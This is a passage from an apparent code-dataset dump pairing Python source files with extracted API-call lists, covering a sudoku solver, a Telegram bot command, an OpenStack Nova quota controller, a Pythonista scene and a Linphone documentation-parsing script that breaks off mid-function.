CGAL.CGAL_Kernel import Point_2\\n'), ((1565, 1579), 'CGAL.CGAL_Kernel.Point_2', 'Point_2', (['(14)', '(1)'], {}), '(14, 1)\\n', (1572, 1579), False, 'from CGAL.CGAL_Kernel import Point_2\\n')]"}}},{"rowIdx":710,"cells":{"code":{"kind":"string","value":"import scene \n\nclass MyScene(scene.Scene):\n def setup(self):\n self.label_node = scene.LabelNode('A',\n position=(100,400), parent=self)\n self.start_flag = False\n \n def update(self):\n if self.start_flag:\n x,y = self.label_node.position\n if x < 340:\n self.label_node.position = (x+2, y)\n else:\n self.start_flag = False\n \n def touch_ended(self, touch):\n self.start_flag = True\n\nscene.run(MyScene())\n"},"apis":{"kind":"list like","value":["scene.LabelNode"],"string":"[\n \"scene.LabelNode\"\n]"},"extract_api":{"kind":"string","value":"[((91, 145), 'scene.LabelNode', 'scene.LabelNode', (['\"\"\"A\"\"\"'], {'position': '(100, 400)', 'parent': 'self'}), \"('A', position=(100, 400), parent=self)\\n\", (106, 145), False, 'import scene\\n')]"}}},{"rowIdx":711,"cells":{"code":{"kind":"string","value":"from bot.commands import BaseCommand\n\nimport mongo\n\n\nclass DisconnectCommand(BaseCommand):\n\n _COMMAND = 'disconnect'\n _DESCRIPTION = 'Close currently active chat.'\n _SUCCESS_MESSAGE = 'Disconnected from chat'\n\n def _callback(self, user, _bot, update, **kwargs):\n return self._call(user, _bot, update, **kwargs)\n\n def _call(self, user, _bot, update, **kwargs):\n chat = mongo.chats.get_active_chat_by_telegram_id(user.id)\n if chat:\n mongo.chats.disable_chat(chat['_id'])\n return True\n\n _bot.send_message(\n user.id,\n 'You are not connected to any vk user',\n )\n return 
False\n"},"apis":{"kind":"list like","value":["mongo.chats.get_active_chat_by_telegram_id","mongo.chats.disable_chat"],"string":"[\n \"mongo.chats.get_active_chat_by_telegram_id\",\n \"mongo.chats.disable_chat\"\n]"},"extract_api":{"kind":"string","value":"[((397, 448), 'mongo.chats.get_active_chat_by_telegram_id', 'mongo.chats.get_active_chat_by_telegram_id', (['user.id'], {}), '(user.id)\\n', (439, 448), False, 'import mongo\\n'), ((478, 515), 'mongo.chats.disable_chat', 'mongo.chats.disable_chat', ([\"chat['_id']\"], {}), \"(chat['_id'])\\n\", (502, 515), False, 'import mongo\\n')]"}}},{"rowIdx":712,"cells":{"code":{"kind":"string","value":"import numpy as np\n\nboard = np.zeros(shape=(9, 9))\ncount = 0\n\n\ndef solve():\n global count\n count += 1\n if count % 1000 == 0:\n print('\\rCurrent number of computations made:', count, end='')\n freePos = find()\n if freePos is None:\n return True\n i = freePos[0]\n j = freePos[1]\n for w in range(1, 10):\n if possible(w, freePos):\n board[i][j] = w\n\n if solve():\n return True\n\n board[i][j] = 0\n\n return False\n\n\ndef find():\n for i in range(9):\n for j in range(9):\n if board[i][j] == 0:\n return [i, j]\n return None\n\n\ndef possible(value, position):\n # position = (i, j) tuple\n i = position[0]\n j = position[1]\n\n # checks row and column for repeat value\n if (value in board[:, j]) or (value in board[i]):\n return False\n\n # reset to i,j - top left square\n i = (i // 3) * 3\n j = (j // 3) * 3\n\n # check all squares in square\n for n in range(i, i + 3):\n for m in range(j, j + 3):\n if board[n][m] == value:\n return False\n return True\n\n\ndef change(position):\n # position = (i, j) tuple\n i = position[0]\n j = position[1]\n for w in range(1, 10):\n if w not in board[:, j] and w not in board[i]:\n board[i][j] = w\n return True\n return False\n\n\ndef initialize():\n print(\"Please enter the values on the board starting from left to right, top to bottom, 0 for blank\")\n integerChunk = input(\"Numbers: \")\n pos = 0\n for i in range(9):\n for j in range(9):\n board[i][j] = int(integerChunk[pos])\n pos += 1\n\n\ndef displayBoard():\n for i in range(3):\n for j in range(9):\n if board[i][j] == 0:\n print(\" \", end=\"\")\n else:\n print(\"%d \" % board[i][j], end=\"\")\n if (j == 2) or (j == 5):\n print(\"| \", end=\"\")\n if j == 8:\n print(\"\")\n print(\"- - - - - - - - - - -\")\n for i in range(3, 6):\n for j in range(9):\n if board[i][j] == 0:\n print(\" \", end=\"\")\n else:\n print(\"%d \" % board[i][j], end=\"\")\n if (j == 2) or (j == 5):\n print(\"| \", end=\"\")\n if j == 8:\n print(\"\")\n print(\"- - - - - - - - - - -\")\n for i in range(6, 9):\n for j in range(9):\n if board[i][j] == 0:\n print(\" \", end=\"\")\n else:\n print(\"%d \" % board[i][j], end=\"\")\n if (j == 2) or (j == 5):\n print(\"| \", end=\"\")\n if j == 8:\n print(\"\")\n\n\ndef main():\n initialize()\n print(\"Is this the correct board? 
Press enter to continue or 'q' to exit program.\")\n displayBoard()\n response = input()\n if response == \"q\":\n exit()\n print(\"---------------SOLVING---------------\\n\")\n solve()\n print(\"\\r\\rSOLUTION\")\n displayBoard()\n print(\"\\nTotal number of computations:\", count)\n\n\nif __name__ == \"__main__\":\n main()\n\n"},"apis":{"kind":"list like","value":["numpy.zeros"],"string":"[\n \"numpy.zeros\"\n]"},"extract_api":{"kind":"string","value":"[((28, 50), 'numpy.zeros', 'np.zeros', ([], {'shape': '(9, 9)'}), '(shape=(9, 9))\\n', (36, 50), True, 'import numpy as np\\n')]"}}},{"rowIdx":713,"cells":{"code":{"kind":"string","value":"# Copyright 2012 OpenStack Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nfrom nova.api.openstack import api_version_request\nfrom nova.api.openstack.api_version_request \\\n import MIN_WITHOUT_PROXY_API_SUPPORT_VERSION\nfrom nova.api.openstack import extensions\nfrom nova.api.openstack import wsgi\nfrom nova.policies import used_limits as ul_policies\nfrom nova import quota\n\n\nQUOTAS = quota.QUOTAS\n\n\nclass UsedLimitsController(wsgi.Controller):\n\n @staticmethod\n def _reserved(req):\n try:\n return int(req.GET['reserved'])\n except (ValueError, KeyError):\n return False\n\n @wsgi.extends\n @extensions.expected_errors(())\n def index(self, req, resp_obj):\n context = req.environ['nova.context']\n project_id = self._project_id(context, req)\n quotas = QUOTAS.get_project_quotas(context, project_id, usages=True)\n if api_version_request.is_supported(\n req, min_version=MIN_WITHOUT_PROXY_API_SUPPORT_VERSION):\n quota_map = {\n 'totalRAMUsed': 'ram',\n 'totalCoresUsed': 'cores',\n 'totalInstancesUsed': 'instances',\n 'totalServerGroupsUsed': 'server_groups',\n }\n else:\n quota_map = {\n 'totalRAMUsed': 'ram',\n 'totalCoresUsed': 'cores',\n 'totalInstancesUsed': 'instances',\n 'totalFloatingIpsUsed': 'floating_ips',\n 'totalSecurityGroupsUsed': 'security_groups',\n 'totalServerGroupsUsed': 'server_groups',\n }\n\n used_limits = {}\n for display_name, key in quota_map.items():\n if key in quotas:\n reserved = (quotas[key]['reserved']\n if self._reserved(req) else 0)\n used_limits[display_name] = quotas[key]['in_use'] + reserved\n\n resp_obj.obj['limits']['absolute'].update(used_limits)\n\n def _project_id(self, context, req):\n if 'tenant_id' in req.GET:\n tenant_id = req.GET.get('tenant_id')\n target = {\n 'project_id': tenant_id,\n 'user_id': context.user_id\n }\n context.can(ul_policies.BASE_POLICY_NAME, target)\n return tenant_id\n return context.project_id\n"},"apis":{"kind":"list like","value":["nova.api.openstack.extensions.expected_errors","nova.api.openstack.api_version_request.is_supported"],"string":"[\n \"nova.api.openstack.extensions.expected_errors\",\n \"nova.api.openstack.api_version_request.is_supported\"\n]"},"extract_api":{"kind":"string","value":"[((1173, 1203), 'nova.api.openstack.extensions.expected_errors', 'extensions.expected_errors', (['()'], {}), '(())\\n', (1199, 1203), False, 'from nova.api.openstack import 
extensions\\n'), ((1426, 1519), 'nova.api.openstack.api_version_request.is_supported', 'api_version_request.is_supported', (['req'], {'min_version': 'MIN_WITHOUT_PROXY_API_SUPPORT_VERSION'}), '(req, min_version=\\n MIN_WITHOUT_PROXY_API_SUPPORT_VERSION)\\n', (1458, 1519), False, 'from nova.api.openstack import api_version_request\\n')]"}}},{"rowIdx":714,"cells":{"code":{"kind":"string","value":"#!/usr/bin/python\n\n# Copyright (C) 2014 Belledonne Communications SARL\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\nimport argparse\nimport os\nimport six\nimport string\nimport sys\nimport xml.etree.ElementTree as ET\nimport xml.dom.minidom as minidom\nimport metadoc\n\n\nclass CObject:\n\tdef __init__(self, name):\n\t\tself.name = name.strip()\n\t\tself.briefDescription = ''\n\t\tself.detailedDescription = None\n\t\tself.deprecated = False\n\t\tself.briefDoc = None\n\n\nclass CEnumValue(CObject):\n\tdef __init__(self, name):\n\t\tCObject.__init__(self, name)\n\t\tself.value = None\n\n\nclass CEnum(CObject):\n\tdef __init__(self, name):\n\t\tCObject.__init__(self, name)\n\t\tself.values = []\n\t\tself.associatedTypedef = None\n\n\tdef addValue(self, value):\n\t\tself.values.append(value)\n\n\nclass CStructMember(CObject):\n\tdef __init__(self, name, t):\n\t\tCObject.__init__(self, name)\n\t\tself.ctype = t.strip()\n\n\nclass CStruct(CObject):\n\tdef __init__(self, name):\n\t\tCObject.__init__(self, name)\n\t\tself.members = []\n\t\tself.associatedTypedef = None\n\n\tdef addMember(self, member):\n\t\tself.members.append(member)\n\n\nclass CTypedef(CObject):\n\tdef __init__(self, name, definition):\n\t\tCObject.__init__(self, name)\n\t\tself.definition = definition.strip()\n\n\nclass CArgument(CObject):\n\tdef __init__(self, t, name = '', enums = [], structs = []):\n\t\tCObject.__init__(self, name)\n\t\tself.description = None\n\t\tself.containedType = None\n\t\tkeywords = [ 'const', 'struct', 'enum', 'signed', 'unsigned', 'short', 'long', '*' ]\n\t\tfullySplittedType = []\n\t\tsplittedType = t.strip().split(' ')\n\t\tfor s in splittedType:\n\t\t\tif s.startswith('*'):\n\t\t\t\tfullySplittedType.append('*')\n\t\t\t\tif len(s) > 1:\n\t\t\t\t\tfullySplittedType.append(s[1:])\n\t\t\telif s.endswith('*'):\n\t\t\t\tfullySplittedType.append(s[:-1])\n\t\t\t\tfullySplittedType.append('*')\n\t\t\telse:\n\t\t\t\tfullySplittedType.append(s)\n\t\tif 'MS2_DEPRECATED' in fullySplittedType:\n\t\t\tfullySplittedType.remove('MS2_DEPRECATED')\n\t\telif 'LINPHONE_DEPRECATED' in fullySplittedType:\n\t\t\tfullySplittedType.remove('LINPHONE_DEPRECATED')\n\t\tisStruct = False\n\t\tisEnum = False\n\t\tself.ctype = 'int' # Default to int so that the result is correct eg. 
for 'unsigned short'\n\t\tfor s in fullySplittedType:\n\t\t\tif not s in keywords:\n\t\t\t\tself.ctype = s\n\t\t\tif s == 'struct':\n\t\t\t\tisStruct = True\n\t\t\tif s == 'enum':\n\t\t\t\tisEnum = True\n\t\tif isStruct:\n\t\t\tfor st in structs:\n\t\t\t\tif st.associatedTypedef is not None:\n\t\t\t\t\tself.ctype = st.associatedTypedef.name\n\t\telif isEnum:\n\t\t\tfor e in enums:\n\t\t\t\tif e.associatedTypedef is not None:\n\t\t\t\t\tself.ctype = e.associatedTypedef.name\n\t\tif self.ctype == 'int' and 'int' not in fullySplittedType:\n\t\t\tif fullySplittedType[-1] == '*':\n\t\t\t\tfullySplittedType.insert(-1, 'int')\n\t\t\telse:\n\t\t\t\tfullySplittedType.append('int')\n\t\tself.completeType = ' '.join(fullySplittedType)\n\n\tdef __str__(self):\n\t\treturn self.completeType + \" \" + self.name\n\n\nclass CArgumentsList:\n\tdef __init__(self):\n\t\tself.arguments = []\n\n\tdef addArgument(self, arg):\n\t\tself.arguments.append(arg)\n\n\tdef __len__(self):\n\t\treturn len(self.arguments)\n\n\tdef __getitem__(self, key):\n\t\treturn self.arguments[key]\n\n\tdef __str__(self):\n\t\targstr = []\n\t\tfor arg in self.arguments:\n\t\t\targstr.append(str(arg))\n\t\treturn ', '.join(argstr)\n\n\nclass CFunction(CObject):\n\tdef __init__(self, name, returnarg, argslist):\n\t\tCObject.__init__(self, name)\n\t\tself.returnArgument = returnarg\n\t\tself.arguments = argslist\n\t\tself.location = None\n\n\nclass CEvent(CFunction):\n\tpass\n\n\nclass CProperty:\n\tdef __init__(self, name):\n\t\tself.name = name\n\t\tself.getter = None\n\t\tself.setter = None\n\n\nclass CClass(CObject):\n\tdef __init__(self, st):\n\t\tCObject.__init__(self, st.associatedTypedef.name)\n\t\tif st.deprecated or st.associatedTypedef.deprecated:\n\t\t\tself.deprecated = True\n\t\tif len(st.associatedTypedef.briefDescription) > 0:\n\t\t\tself.briefDescription = st.associatedTypedef.briefDescription\n\t\telif len(st.briefDescription) > 0:\n\t\t\tself.briefDescription = st.briefDescription\n\t\tif st.associatedTypedef.detailedDescription is not None:\n\t\t\tself.detailedDescription = st.associatedTypedef.detailedDescription\n\t\telif st.detailedDescription is not None:\n\t\t\tself.detailedDescription = st.detailedDescription\n\t\tself.__struct = st\n\t\tself.events = {}\n\t\tself.classMethods = {}\n\t\tself.instanceMethods = {}\n\t\tself.properties = {}\n\t\tself.__computeCFunctionPrefix()\n\n\tdef __computeCFunctionPrefix(self):\n\t\tself.cFunctionPrefix = ''\n\t\tfirst = True\n\t\tfor l in self.name:\n\t\t\tif l.isupper() and not first:\n\t\t\t\tself.cFunctionPrefix += '_'\n\t\t\tself.cFunctionPrefix += l.lower()\n\t\t\tfirst = False\n\t\tself.cFunctionPrefix += '_'\n\n\tdef __addPropertyGetter(self, name, f):\n\t\tif not name in self.properties:\n\t\t\tprop = CProperty(name)\n\t\t\tself.properties[name] = prop\n\t\tself.properties[name].getter = f\n\n\tdef __addPropertySetter(self, name, f):\n\t\tif not name in self.properties:\n\t\t\tprop = CProperty(name)\n\t\t\tself.properties[name] = prop\n\t\tself.properties[name].setter = f\n\n\tdef __addClassMethod(self, f):\n\t\tif not f.name in self.classMethods:\n\t\t\tself.classMethods[f.name] = f\n\n\tdef __addInstanceMethod(self, f):\n\t\tname = f.name[len(self.cFunctionPrefix):]\n\t\tif name.startswith('get_') and len(f.arguments) == 1:\n\t\t\tself.__addPropertyGetter(name[4:], f)\n\t\telif name.startswith('is_') and len(f.arguments) == 1 and f.returnArgument.ctype == 'bool_t':\n\t\t\tself.__addPropertyGetter(name, f)\n\t\telif name.endswith('_enabled') and len(f.arguments) == 1 
and f.returnArgument.ctype == 'bool_t':\n\t\t\tself.__addPropertyGetter(name, f)\n\t\telif name.startswith('set_') and len(f.arguments) == 2:\n\t\t\tself.__addPropertySetter(name[4:], f)\n\t\telif name.startswith('enable_') and len(f.arguments) == 2 and f.arguments[1].ctype == 'bool_t':\n\t\t\tself.__addPropertySetter(name[7:] + '_enabled', f)\n\t\telse:\n\t\t\tif not f.name in self.instanceMethods:\n\t\t\t\tself.instanceMethods[f.name] = f\n\n\tdef addEvent(self, ev):\n\t\tif not ev.name in self.events:\n\t\t\tself.events[ev.name] = ev\n\n\tdef addMethod(self, f):\n\t\tif len(f.arguments) > 0 and f.arguments[0].ctype == self.name:\n\t\t\tself.__addInstanceMethod(f)\n\t\telse:\n\t\t\tself.__addClassMethod(f)\n\n\nclass Project:\n\tdef __init__(self):\n\t\tself.verbose = False\n\t\tself.prettyPrint = False\n\t\tself.enums = []\n\t\tself.__structs = []\n\t\tself.__typedefs = []\n\t\tself.__events = []\n\t\tself.__functions = []\n\t\tself.classes = []\n\t\tself.docparser = metadoc.Parser()\n\n\tdef add(self, elem):\n\t\tif isinstance(elem, CClass):\n\t\t\tif self.verbose:\n\t\t\t\tprint(\"Adding class \" + elem.name)\n\t\t\tself.classes.append(elem)\n\t\telif isinstance(elem, CEnum):\n\t\t\tif self.verbose:\n\t\t\t\tprint(\"Adding enum \" + elem.name)\n\t\t\t\tfor ev in elem.values:\n\t\t\t\t\tprint(\"\\t\" + ev.name)\n\t\t\tself.enums.append(elem)\n\t\telif isinstance(elem, CStruct):\n\t\t\tif self.verbose:\n\t\t\t\tprint(\"Adding struct \" + elem.name)\n\t\t\t\tfor sm in elem.members:\n\t\t\t\t\tprint(\"\\t\" + sm.ctype + \" \" + sm.name)\n\t\t\tself.__structs.append(elem)\n\t\telif isinstance(elem, CTypedef):\n\t\t\tif self.verbose:\n\t\t\t\tprint(\"Adding typedef \" + elem.name)\n\t\t\t\tprint(\"\\t\" + elem.definition)\n\t\t\tself.__typedefs.append(elem)\n\t\telif isinstance(elem, CEvent):\n\t\t\tif self.verbose:\n\t\t\t\tprint(\"Adding event \" + elem.name)\n\t\t\t\tprint(\"\\tReturns: \" + elem.returnArgument.ctype)\n\t\t\t\tprint(\"\\tArguments: \" + str(elem.arguments))\n\t\t\tself.__events.append(elem)\n\t\telif isinstance(elem, CFunction):\n\t\t\tif self.verbose:\n\t\t\t\tprint(\"Adding function \" + elem.name)\n\t\t\t\tprint(\"\\tReturns: \" + elem.returnArgument.ctype)\n\t\t\t\tprint(\"\\tArguments: \" + str(elem.arguments))\n\t\t\tself.__functions.append(elem)\n\n\tdef __cleanDescription(self, descriptionNode):\n\t\tfor para in descriptionNode.findall('./para'):\n\t\t\tfor n in para.findall('./parameterlist'):\n\t\t\t\tpara.remove(n)\n\t\t\tfor n in para.findall(\"./simplesect[@kind='return']\"):\n\t\t\t\tpara.remove(n)\n\t\t\tfor n in para.findall(\"./simplesect[@kind='see']\"):\n\t\t\t\tt = ''.join(n.itertext())\n\t\t\t\tn.clear()\n\t\t\t\tn.tag = 'see'\n\t\t\t\tn.text = t\n\t\t\tfor n in para.findall(\"./simplesect[@kind='note']\"):\n\t\t\t\tn.tag = 'note'\n\t\t\t\tn.attrib = {}\n\t\t\tfor n in para.findall(\".//xrefsect\"):\n\t\t\t\tpara.remove(n)\n\t\t\tfor n in para.findall('.//ref'):\n\t\t\t\tn.attrib = {}\n\t\t\tfor n in para.findall(\".//bctbx_list\"):\n\t\t\t\tpara.remove(n)\n\t\tif descriptionNode.tag == 'parameterdescription':\n\t\t\tdescriptionNode.tag = 'description'\n\t\tif descriptionNode.tag == 'simplesect':\n\t\t\tdescriptionNode.tag = 'description'\n\t\t\tdescriptionNode.attrib = {}\n\t\treturn descriptionNode\n\t\n\tdef __canBeWrapped(self, node):\n\t\treturn node.find('./detaileddescription//donotwrap') is None\n\n\tdef __discoverClasses(self):\n\t\tfor td in self.__typedefs:\n\t\t\tif td.definition.startswith('enum '):\n\t\t\t\tfor e in 
self.enums:\n\t\t\t\t\tif (e.associatedTypedef is None) and td.definition[5:] == e.name:\n\t\t\t\t\t\te.associatedTypedef = td\n\t\t\t\t\t\tbreak\n\t\t\telif td.definition.startswith('struct '):\n\t\t\t\tstructFound = False\n\t\t\t\tfor st in self.__structs:\n\t\t\t\t\tif (st.associatedTypedef is None) and td.definition[7:] == st.name:\n\t\t\t\t\t\tst.associatedTypedef = td\n\t\t\t\t\t\tstructFound = True\n\t\t\t\t\t\tbreak\n\t\t\t\tif not structFound:\n\t\t\t\t\tname = td.definition[7:]\n\t\t\t\t\tprint(\"Structure with no associated typedef: \" + name)\n\t\t\t\t\tst = CStruct(name)\n\t\t\t\t\tst.associatedTypedef = td\n\t\t\t\t\tself.add(st)\n\t\tfor td in self.__typedefs:\n\t\t\tif td.definition.startswith('struct '):\n\t\t\t\tfor st in self.__structs:\n\t\t\t\t\tif st.associatedTypedef == td:\n\t\t\t\t\t\tcclass = CClass(st)\n\t\t\t\t\t\tcclass.briefDoc = td.briefDoc\n\t\t\t\t\t\tself.add(cclass)\n\t\t\t\t\t\tbreak\n\t\t\telif ('Linphone' + td.definition) == td.name:\n\t\t\t\tst = CStruct(td.name)\n\t\t\t\tst.associatedTypedef = td\n\t\t\t\tcclass = CClass(st)\n\t\t\t\tcclass.briefDoc = td.briefDoc\n\t\t\t\tself.add(st)\n\t\t\t\tself.add(cclass)\n\t\t# Sort classes by length of name (longest first), so that methods are put in the right class\n\t\tself.classes.sort(key = lambda c: len(c.name), reverse = True)\n\t\tfor e in self.__events:\n\t\t\teventAdded = False\n\t\t\tfor c in self.classes:\n\t\t\t\tif c.name.endswith('Cbs') and e.name.startswith(c.name):\n\t\t\t\t\tc.addEvent(e)\n\t\t\t\t\teventAdded = True\n\t\t\t\t\tbreak\n\t\t\tif not eventAdded:\n\t\t\t\tfor c in self.classes:\n\t\t\t\t\tif e.name.startswith(c.name):\n\t\t\t\t\t\tc.addEvent(e)\n\t\t\t\t\t\teventAdded = True\n\t\t\t\t\t\tbreak\n\t\tfor f in self.__functions:\n\t\t\tfor c in self.classes:\n\t\t\t\tif c.cFunctionPrefix == f.name[0 : len(c.cFunctionPrefix)]:\n\t\t\t\t\tc.addMethod(f)\n\t\t\t\t\tbreak\n\n\tdef __parseCEnumValueInitializer(self, initializer):\n\t\tinitializer = initializer.strip()\n\t\tif not initializer.startswith('='):\n\t\t\treturn None\n\n\t\tinitializer = initializer[1:]\n\t\tinitializer.strip()\n\t\treturn initializer\n\n\tdef __parseCEnumValue(self, node):\n\t\tev = CEnumValue(node.find('./name').text)\n\t\tinitializerNode = node.find('./initializer')\n\t\tif initializerNode is not None:\n\t\t\tev.value = self.__parseCEnumValueInitializer(initializerNode.text)\n\n\t\tdeprecatedNode = node.find(\".//xrefsect[xreftitle='Deprecated']\")\n\t\tif deprecatedNode is not None:\n\t\t\tev.deprecated = True\n\t\tev.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()\n\t\tev.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))\n\t\tev.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))\n\t\treturn ev\n\n\tdef __parseCEnumMemberdef(self, node):\n\t\tif not Project.__canBeWrapped(self, node):\n\t\t\treturn None\n\t\te = CEnum(node.find('./name').text)\n\t\tdeprecatedNode = node.find(\".//xrefsect[xreftitle='Deprecated']\")\n\t\tif deprecatedNode is not None:\n\t\t\te.deprecated = True\n\t\te.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()\n\t\te.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))\n\t\te.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))\n\t\tenumvalues = node.findall(\"enumvalue[@prot='public']\")\n\t\tfor enumvalue in enumvalues:\n\t\t\tev = self.__parseCEnumValue(enumvalue)\n\t\t\te.addValue(ev)\n\t\treturn e\n\n\tdef 
__findCEnum(self, tree):\n\t\tmemberdefs = tree.findall(\"./compounddef[@kind='group']/sectiondef[@kind='enum']/memberdef[@kind='enum'][@prot='public']\")\n\t\tfor m in memberdefs:\n\t\t\te = self.__parseCEnumMemberdef(m)\n\t\t\tself.add(e)\n\n\tdef __parseCStructMember(self, node, structname):\n\t\tname = node.find('./name').text\n\t\tdefinition = node.find('./definition').text\n\t\tt = definition[0:definition.find(structname + \"::\" + name)]\n\t\tsm = CStructMember(name, t)\n\t\tdeprecatedNode = node.find(\".//xrefsect[xreftitle='Deprecated']\")\n\t\tif deprecatedNode is not None:\n\t\t\tsm.deprecated = True\n\t\tsm.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()\n\t\tsm.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))\n\t\tsm.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))\n\t\treturn sm\n\n\tdef __parseCStructCompounddef(self, node):\n\t\ts = CStruct(node.find('./compoundname').text)\n\t\tdeprecatedNode = node.find(\".//xrefsect[xreftitle='Deprecated']\")\n\t\tif deprecatedNode is not None:\n\t\t\ts.deprecated = True\n\t\ts.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()\n\t\ts.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))\n\t\ts.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))\n\t\tstructmembers = node.findall(\"sectiondef/memberdef[@kind='variable'][@prot='public']\")\n\t\tfor structmember in structmembers:\n\t\t\tsm = self.__parseCStructMember(structmember, s.name)\n\t\t\ts.addMember(sm)\n\t\treturn s\n\n\tdef __findCStruct(self, tree):\n\t\tcompounddefs = tree.findall(\"./compounddef[@kind='struct'][@prot='public']\")\n\t\tfor c in compounddefs:\n\t\t\ts = self.__parseCStructCompounddef(c)\n\t\t\tself.add(s)\n\n\tdef __parseCTypedefMemberdef(self, node):\n\t\tif not Project.__canBeWrapped(self, node):\n\t\t\treturn None\n\t\tname = node.find('./name').text\n\t\tdefinition = node.find('./definition').text\n\t\tif definition.startswith('typedef '):\n\t\t\tdefinition = definition[8 :]\n\t\tif name.endswith('Cb'):\n\t\t\tpos = definition.find(\"(*\")\n\t\t\tif pos == -1:\n\t\t\t\treturn None\n\t\t\treturntype = definition[0:pos].strip()\n\t\t\treturnarg = CArgument(returntype, enums = self.enums, structs = self.__structs)\n\t\t\treturndesc = node.find(\"./detaileddescription/para/simplesect[@kind='return']\")\n\t\t\tif returndesc is not None:\n\t\t\t\tif returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t':\n\t\t\t\t\tn = returndesc.find('.//bctbxlist')\n\t\t\t\t\tif n is not None:\n\t\t\t\t\t\treturnarg.containedType = n.text\n\t\t\t\treturnarg.description = self.__cleanDescription(returndesc)\n\t\t\telif returnarg.completeType != 'void':\n\t\t\t\tmissingDocWarning += \"\\tReturn value is not documented\\n\"\n\t\t\tdefinition = definition[pos + 2 :]\n\t\t\tpos = definition.find(\"(\")\n\t\t\tdefinition = definition[pos + 1 : -1]\n\t\t\targslist = CArgumentsList()\n\t\t\tfor argdef in definition.split(', '):\n\t\t\t\targType = ''\n\t\t\t\tstarPos = argdef.rfind('*')\n\t\t\t\tspacePos = argdef.rfind(' ')\n\t\t\t\tif starPos != -1:\n\t\t\t\t\targType = argdef[0 : starPos + 1]\n\t\t\t\t\targName = argdef[starPos + 1 :]\n\t\t\t\telif spacePos != -1:\n\t\t\t\t\targType = argdef[0 : spacePos]\n\t\t\t\t\targName = argdef[spacePos + 1 :]\n\t\t\t\targslist.addArgument(CArgument(argType, argName, self.enums, self.__structs))\n\t\t\tif len(argslist) > 0:\n\t\t\t\tparamdescs = 
node.findall(\"detaileddescription/para/parameterlist[@kind='param']/parameteritem\")\n\t\t\t\tif paramdescs:\n\t\t\t\t\tfor arg in argslist.arguments:\n\t\t\t\t\t\tfor paramdesc in paramdescs:\n\t\t\t\t\t\t\tif arg.name == paramdesc.find('./parameternamelist').find('./parametername').text:\n\t\t\t\t\t\t\t\targ.description = self.__cleanDescription(paramdesc.find('./parameterdescription'))\n\t\t\t\t\tmissingDocWarning = ''\n\t\t\t\t\tfor arg in argslist.arguments:\n\t\t\t\t\t\tif arg.description == None:\n\t\t\t\t\t\t\tmissingDocWarning += \"\\t'\" + arg.name + \"' parameter not documented\\n\";\n\t\t\t\t\tif missingDocWarning != '':\n\t\t\t\t\t\tprint(name + \":\\n\" + missingDocWarning)\n\t\t\tf = CEvent(name, returnarg, argslist)\n\t\t\tdeprecatedNode = node.find(\".//xrefsect[xreftitle='Deprecated']\")\n\t\t\tif deprecatedNode is not None:\n\t\t\t\tf.deprecated = True\n\t\t\tf.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()\n\t\t\tf.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))\n\t\t\tf.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))\n\t\t\treturn f\n\t\telse:\n\t\t\tpos = definition.rfind(\" \" + name)\n\t\t\tif pos != -1:\n\t\t\t\tdefinition = definition[0 : pos]\n\t\t\ttd = CTypedef(name, definition)\n\t\t\tdeprecatedNode = node.find(\".//xrefsect[xreftitle='Deprecated']\")\n\t\t\tif deprecatedNode is not None:\n\t\t\t\ttd.deprecated = True\n\t\t\ttd.briefDescription = ''.join(node.find('./briefdescription').itertext()).strip()\n\t\t\ttd.briefDoc = self.docparser.parse_description(node.find('./briefdescription'))\n\t\t\ttd.detailedDescription = self.__cleanDescription(node.find('./detaileddescription'))\n\t\t\treturn td\n\t\treturn None\n\n\tdef __findCTypedef(self, tree):\n\t\tmemberdefs = tree.findall(\"./compounddef[@kind='group']/sectiondef[@kind='typedef']/memberdef[@kind='typedef'][@prot='public']\")\n\t\tfor m in memberdefs:\n\t\t\ttd = self.__parseCTypedefMemberdef(m)\n\t\t\tself.add(td)\n\n\tdef __parseCFunctionMemberdef(self, node):\n\t\tif not Project.__canBeWrapped(self, node):\n\t\t\treturn None\n\t\tinternal = node.find(\"./detaileddescription/internal\")\n\t\tif internal is not None:\n\t\t\treturn None\n\t\tmissingDocWarning = ''\n\t\tname = node.find('./name').text\n\t\tt = ''.join(node.find('./type').itertext())\n\t\treturnarg = CArgument(t, enums = self.enums, structs = self.__structs)\n\t\treturndesc = node.find(\"./detaileddescription/para/simplesect[@kind='return']\")\n\t\tif returndesc is not None:\n\t\t\tif returnarg.ctype == 'MSList' or returnarg.ctype == 'bctbx_list_t':\n\t\t\t\tn = returndesc.find('.//bctbxlist')\n\t\t\t\tif n is not None:\n\t\t\t\t\treturnarg.containedType = n.text\n\t\t\treturnarg.description = self.__cleanDescription(returndesc)\n\t\telif returnarg.completeType != 'void':\n\t\t\tmissingDocWarning += \"\\tReturn value is not documented\\n\"\n\t\targslist = CArgumentsList()\n\t\targslistNode = node.findall('./param')\n\t\tfor argNode in argslistNode:\n\t\t\targType = 